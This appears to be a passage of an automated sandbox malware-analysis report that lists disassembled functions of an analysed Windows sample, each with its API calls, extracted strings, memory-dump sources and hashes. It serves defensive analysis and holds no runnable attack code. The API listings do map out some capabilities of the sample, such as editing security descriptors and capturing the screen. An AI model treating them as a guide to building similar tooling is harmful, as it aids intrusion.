                                                                                                                                  • Instruction Fuzzy Hash: 5B9181746083019FCB14EF14C851A6AB7E2AF48364F04989DF8956B3E2DB31FD4AEB41
                                                                                                                                  Function 00F0E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F0E3BB
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F09615,?), ref: 00F0E417
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0E457
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0E49C
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0E4D3
                                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,00F09615,?), ref: 00F0E4DF
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0E4EF
                                                                                                                                  • DestroyCursor.USER32(?), ref: 00F0E4FE
                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F0E51B
                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F0E527
                                                                                                                                    • Part of subcall function 00EC1BC7: __wcsicmp_l.LIBCMT ref: 00EC1C50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                                  • Opcode ID: e42ccc756b405c1f40f12d864c33b361f9b7f85d54ff091e16107423918e1cf1
                                                                                                                                  • Instruction ID: 197635f70a5f4b1ad6cef1e1fcaefe9b539251b89ad06838be6fcb1841c177c7
                                                                                                                                  • Opcode Fuzzy Hash: e42ccc756b405c1f40f12d864c33b361f9b7f85d54ff091e16107423918e1cf1
                                                                                                                                  • Instruction Fuzzy Hash: 9F61CF71A40218BFEB24DF64CC46FEA7BA8AB09720F104505F911E70D1DBB4E981EBA0
                                                                                                                                  Function 00EF0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00EF0EFF
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EF0F0F
                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EF0F1B
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EF0F79
                                                                                                                                  • _wcscat.LIBCMT ref: 00EF0F91
                                                                                                                                  • _wcscat.LIBCMT ref: 00EF0FA3
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00EF0FB8
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF0FCC
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF0FFE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF101F
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EF102B
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EF106A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                                  • Opcode ID: e308dc713b8163f8549053b009fa5c4127cc59a358548ee5e8071917b984da19
                                                                                                                                  • Instruction ID: 0b4ef9a84cdf00918e184cbbdeb0fa6d5921a45f98287fccf59449d81055c0e2
                                                                                                                                  • Opcode Fuzzy Hash: e308dc713b8163f8549053b009fa5c4127cc59a358548ee5e8071917b984da19
                                                                                                                                  • Instruction Fuzzy Hash: 626170725043499FCB10EF20C8449AFB7E8FF89314F14995EFA89A7251EB31E945CB92
                                                                                                                                  Function 00EEDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00EEDB26
                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 00EEDB73
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEDBBB
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEDBF2
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEDC20
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                                  • Opcode ID: fa3e8b3780da6cd2680b8ad0bcaf6b32d2f87442b75cf7bdd5ed8fe9beb0f26a
                                                                                                                                  • Instruction ID: e11b967ed1df9aaee385c975385366b6c3f30fef8d8389dceb6e1e4e8265b4c7
                                                                                                                                  • Opcode Fuzzy Hash: fa3e8b3780da6cd2680b8ad0bcaf6b32d2f87442b75cf7bdd5ed8fe9beb0f26a
                                                                                                                                  • Instruction Fuzzy Hash: 3A515B71108305AFC704EF14C98186BB7E9FF89758F10986CF896AB261DB31EE09CB52
                                                                                                                                  Function 00EE3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F14085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00EE3145
                                                                                                                                  • LoadStringW.USER32(00000000,?,00F14085,00000016), ref: 00EE314E
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00F14085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00EE3170
                                                                                                                                  • LoadStringW.USER32(00000000,?,00F14085,00000016), ref: 00EE3173
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE31B3
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE31C5
                                                                                                                                  • _wprintf.LIBCMT ref: 00EE326C
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EE3283
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                  • API String ID: 984253442-2268648507
                                                                                                                                  • Opcode ID: b5892f10c1bcc0225fa882114bd7a4e0571c3fe8d98620b7a6dd0d4dea8283b2
                                                                                                                                  • Instruction ID: 0e88c06a033757ca903e019cac7b6b66562930ecb2b3590bef03f93e05429894
                                                                                                                                  • Opcode Fuzzy Hash: b5892f10c1bcc0225fa882114bd7a4e0571c3fe8d98620b7a6dd0d4dea8283b2
                                                                                                                                  • Instruction Fuzzy Hash: 3541457290020DA6CB14FBE5DD47EEFB7B8AF19741F105065F601B60A1DE61AF04DA61
                                                                                                                                  Function 00EED950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00EED96C
                                                                                                                                  • __swprintf.LIBCMT ref: 00EED98E
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EED9CB
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EED9F0
                                                                                                                                  • _memset.LIBCMT ref: 00EEDA0F
                                                                                                                                  • _wcsncpy.LIBCMT ref: 00EEDA4B
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00EEDA80
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00EEDA8B
                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00EEDA94
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00EEDA9E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                  • Opcode ID: 68cc34b9e615bbc85de5aeab0861fe03c374596c231df734dde4b21b6c178f4d
                                                                                                                                  • Instruction ID: 6f4ffade3b96556ad56d01aadc1261bcafed3ed143e3ae6d09e64691b49949f7
                                                                                                                                  • Opcode Fuzzy Hash: 68cc34b9e615bbc85de5aeab0861fe03c374596c231df734dde4b21b6c178f4d
                                                                                                                                  • Instruction Fuzzy Hash: DA31B27260024CAADB20DFA5DC49FDA77FCEF84704F1081A5F519E20A1E771DB459BA1
                                                                                                                                  Function 00ED957D Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 884005220-0
                                                                                                                                  • Opcode ID: a0d36afe1f074984c30803b3fd032cb4f84d783f9c0a6cb9998b0771b5dc99a3
                                                                                                                                  • Instruction ID: 3561372df9790b376ad99904e1ee3168d5f09233c7ca767499617eb77604b05d
                                                                                                                                  • Opcode Fuzzy Hash: a0d36afe1f074984c30803b3fd032cb4f84d783f9c0a6cb9998b0771b5dc99a3
                                                                                                                                  • Instruction Fuzzy Hash: 6161E572904206AFDB255F34DE41B6A37E4EF01724F20211BE861BB3C2DB76D9438B64
                                                                                                                                  Function 00F0E541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F0E564
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00F0E57B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F0E586
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F0E593
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00F0E59C
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F0E5AB
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00F0E5B4
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F0E5BB
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F0E5CC
                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F2D9BC,?), ref: 00F0E5E5
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00F0E5F5
                                                                                                                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00F0E619
                                                                                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00F0E644
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00F0E66C
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F0E682
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                  • Opcode ID: 1dfdffd84e3eb236d55c8ae67143126a486b6060bb156827f0733a552b6c72e7
                                                                                                                                  • Instruction ID: 5aa5a1078e05f8e9f17c0993de078fe67e45072e729b5ec0418792ef601e628e
                                                                                                                                  • Opcode Fuzzy Hash: 1dfdffd84e3eb236d55c8ae67143126a486b6060bb156827f0733a552b6c72e7
                                                                                                                                  • Instruction Fuzzy Hash: 0E415C75A01208FFDB219F64DC48EAE7BB9EF89725F108458F906D72A0D7319D42EB20
                                                                                                                                  Function 00EF0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EF0C93
                                                                                                                                  • _wcscat.LIBCMT ref: 00EF0CAB
                                                                                                                                  • _wcscat.LIBCMT ref: 00EF0CBD
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00EF0CD2
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF0CE6
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00EF0CFE
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EF0D18
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF0D2A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 34673085-438819550
                                                                                                                                  • Opcode ID: 8c4d8211ccbea5a99cd98054134db23f4a72f610625f2875719ec6db30a8956a
                                                                                                                                  • Instruction ID: e3f1b06eb3b1b94f75ccd5e274298f631bed2e3facaf06948f3642fc40804ac5
                                                                                                                                  • Opcode Fuzzy Hash: 8c4d8211ccbea5a99cd98054134db23f4a72f610625f2875719ec6db30a8956a
                                                                                                                                  • Instruction Fuzzy Hash: C081C5715043099FC724DF64C844ABAB7E8BF88314F14992EFA85E7212E731ED85CB92
                                                                                                                                  Function 00EDB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EDB903
                                                                                                                                    • Part of subcall function 00EDB8E7: GetLastError.KERNEL32(?,00EDB3CB,?,?,?), ref: 00EDB90D
                                                                                                                                    • Part of subcall function 00EDB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00EDB3CB,?,?,?), ref: 00EDB91C
                                                                                                                                    • Part of subcall function 00EDB8E7: RtlAllocateHeap.NTDLL(00000000,?,00EDB3CB), ref: 00EDB923
                                                                                                                                    • Part of subcall function 00EDB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EDB93A
                                                                                                                                    • Part of subcall function 00EDB982: GetProcessHeap.KERNEL32(00000008,00EDB3E1,00000000,00000000,?,00EDB3E1,?), ref: 00EDB98E
                                                                                                                                    • Part of subcall function 00EDB982: RtlAllocateHeap.NTDLL(00000000,?,00EDB3E1), ref: 00EDB995
                                                                                                                                    • Part of subcall function 00EDB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EDB3E1,?), ref: 00EDB9A6
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EDB5F7
                                                                                                                                  • _memset.LIBCMT ref: 00EDB60C
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EDB62B
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00EDB63C
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00EDB679
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EDB695
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00EDB6B2
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EDB6C1
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00EDB6C8
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EDB6E9
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00EDB6F0
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EDB721
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EDB747
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EDB75B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2347767575-0
                                                                                                                                  • Opcode ID: ff4a6e2b401b08a7334f53752752db0b29790632a8c1fdc454be26f2f44f66f0
                                                                                                                                  • Instruction ID: 1c47d5edfd74f9acf35d663607c96a178bce1c4403738692ad1db1235f69ae53
                                                                                                                                  • Opcode Fuzzy Hash: ff4a6e2b401b08a7334f53752752db0b29790632a8c1fdc454be26f2f44f66f0
                                                                                                                                  • Instruction Fuzzy Hash: DC514D75900209EFDF14DFA4DC45EEEBBB9FF44304F04816AE915B62A0E7319A06DB60
                                                                                                                                  Function 00EFA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 00EFA2DD
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EFA2E9
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00EFA2F5
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00EFA302
                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EFA356
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00EFA392
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EFA3B6
                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 00EFA3BE
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00EFA3C7
                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 00EFA3CE
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00EFA3D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
